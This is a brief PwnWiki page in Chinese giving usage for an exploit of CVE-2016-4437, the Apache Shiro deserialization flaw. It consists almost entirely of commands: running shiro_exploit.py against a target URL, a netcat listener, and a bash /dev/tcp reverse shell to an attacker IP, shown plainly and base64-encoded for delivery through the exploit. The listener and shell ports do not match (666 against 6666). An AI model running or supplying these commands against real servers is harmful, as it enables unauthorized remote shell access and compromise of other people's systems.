Loading
0

CVE-2016-4437 Shiro反序列化漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

漏洞利用

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

命令执行成功。

Getshell

监听机器执行以下命令:

nc -lvp 666

受害机器执行以下命令:

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库